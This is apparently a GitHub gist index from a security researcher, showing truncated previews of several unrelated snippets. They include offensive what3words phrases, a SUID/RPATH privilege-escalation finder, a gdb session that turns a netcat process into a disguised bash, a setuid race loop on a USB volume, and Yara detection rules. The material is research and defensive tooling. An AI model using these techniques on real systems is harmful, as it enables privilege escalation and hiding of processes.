Tim Brown timb-machine
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Never mind that what3words has real technical, logistical, practical limitations... Let's look at some of the dark, libellous, illegal and/or downright offensive combinations of /// addressess that their word lists can result in: | |
| * https://what3words.com/mistakes.cost.lives | |
| * https://what3words.com/troll.under.bridge | |
| * https://what3words.com/burn.that.school | |
| * https://what3words.com/lorry.catches.fire | |
| * https://what3words.com/shank.that.police | |
| * https://what3words.com/hang.puppy.quick | |
| * https://what3words.com/master.whips.slave | |
| * https://what3words.com/bullets.into.head |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| find / \( \( -perm -u+s \) -o \( -perm -g+s \) \) -a -type f 2>/dev/null | while read SUIDFILE | |
| do | |
| LSFILE=`ls -la "$SUIDFILE"` | |
| objdump -x "$SUIDFILE" 2>&1| egrep 'RPATH|RUNPATH' | while read name paths | |
| do | |
| if [ -n "$paths" ]; then | |
| echo "$paths" | tr ":" "\n" | while read RPATHDIR | |
| do | |
| if [ "`echo "$RPATHDIR" | cut -c 1`" != "/" ] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ nc -v -l -p 5000 & ps -aef | grep nc; sudo gdb /bin/nc `pgrep nc` | |
| timb 3976 952 0 00:22 pts/0 00:00:00 nc -v -l -p 5000 | |
| [1] 3976 | |
| listening on [any] 5000 ... | |
| (gdb) info variable environ | |
| All variables matching regular expression "environ": | |
| (gdb) print execve("/bin/bash", 0x00007f717f158118, 0) | |
| process 3976 is executing new program: /bin/bash | |
| $ ps -aef | grep timb | |
| timb 3976 952 0 00:22 pts/0 00:00:00 ?.#.?. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <sys/types.h> | |
| #include <sys/ptrace.h> | |
| #include <signal.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <openssl/aes.h> | |
| #define MAXIMUMWIDTH 80 | |
| #define MAXIMUMHEIGHT 20 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ cat racecar.sh | |
| #!/bin/sh | |
| while : | |
| do | |
| echo "#!/bin/sh" > /Volumes/USB/a | |
| chmod u+xs /Volumes/USB/a | |
| ls -la /Volumes/USB/a | grep sr | grep -v 10 | |
| done |
timb-machine
/ Looking for Log4J dependents with Yara
Created
December 12, 2021 18:28
Looking for Log4J dependents with Yara
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ sudo yara -r yara/log4j.yara /usr/local | |
| log4jjavaclass /usr/local/java/ghidra_9.1.2_PUBLIC/Ghidra/Framework/Generic/lib/log4j-api-2.8.2.jar | |
| log4jjavasrc /usr/local/java/ghidra_9.1.2_PUBLIC/Ghidra/Framework/Generic/lib/log4j-api-2.8.2.jar | |
| log4jjavaclass /usr/local/java/ghidra_9.1.2_PUBLIC/Ghidra/Framework/Generic/lib/log4j-core-2.8.2.jar | |
| log4jjavasrc /usr/local/java/ghidra_9.1.2_PUBLIC/Ghidra/Framework/Generic/lib/log4j-core-2.8.2.jar |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ ./packet-monkey.sh --type all --pcapfilename packets-hostname-xxx.pcap | |
| _ _ _ | |
| _ __ __ _ ___| | _____| |_ _ __ ___ ___ _ __ | | _____ _ _ | |
| | '_ \ / _` |/ __| |/ / _ \ __|____| '_ ` _ \ / _ \| '_ \| |/ / _ \ | | | | |
| | |_) | (_| | (__| < __/ ||_____| | | | | | (_) | | | | < __/ |_| | | |
| | .__/ \__,_|\___|_|\_\___|\__| |_| |_| |_|\___/|_| |_|_|\_\___|\__, | | |
| |_| |___/ | |
| =[ @timb_machine ]= |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule pscan_or_luckscan { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "Hunts for references to pscan_or_luckscan" | |
| strings: | |
| $getopt = "%s <a-block> <port> [b-block] [c-block]" | |
| $vulnerable = "Lets try to root the %s" | |
| condition: | |
| $getopt or $vulnerable | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # setup webex bot auth token env var - get auth here: https://developer.webex.com/my-apps/new/bot | |
| export WEBEX_TOKEN="GET_TOKEN_ABOVE" | |
| # get room id | |
| WEBEX_ROOMID=$(curl --request GET --header "Authorization: Bearer $WEBEX_TOKEN" https://webexapis.com/v1/rooms |jq -r '.items[] | select(.title == "Room Name") | .id') | |
| # post message | |
| WEBEX_MSG="notification here" | |
| curl --request POST --header "Authorization: Bearer $WEBEX_TOKEN" --form "roomId=$WEBEX_ROOMID" --form "text=$WEBEX_MSG" https://webexapis.com/v1/messages |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ dig any wearekuiper.com | |
| ; <<>> DiG 9.10.6 <<>> any wearekuiper.com | |
| ;; global options: +cmd | |
| ;; Got answer: | |
| ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11921 | |
| ;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 13 | |
| ;; OPT PSEUDOSECTION: | |
| ; EDNS: version: 0, flags:; udp: 4000 |